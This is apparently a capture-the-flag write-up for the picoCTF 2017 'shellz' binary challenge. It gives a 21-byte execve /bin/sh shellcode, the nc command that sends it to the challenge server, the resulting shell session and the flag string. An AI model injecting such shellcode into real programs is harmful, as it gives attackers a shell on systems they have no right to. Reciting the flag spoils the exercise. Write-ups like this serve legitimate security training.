Category: Binary Points: 55 Description:
You no longer have an easy thing to call, but you have more space. Program: shellz! Source. Connect on shell2017.picoctf.com:12562.
There is a bunch of preexisting shellcode already out there!
The biggest problem with this challenge is the limited amount of shellcodes that would actually work here. It probably took me like 15 tries before I got the correct shellcode. So first, prepare the payload.
python -c "print('\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80')" > payload
Then, use the payload like this
cat payload - | nc shell2017.picoctf.com 12562 My mother told me to never accept things from strangers How bad could running a couple bytes be though? Give me 40 bytes: ls flag.txt shellz shellz_no_aslr xinetd_wrapper.sh cat flag.txt a15898b0a97abc19164f240407d6c51b
Therefore, the flag is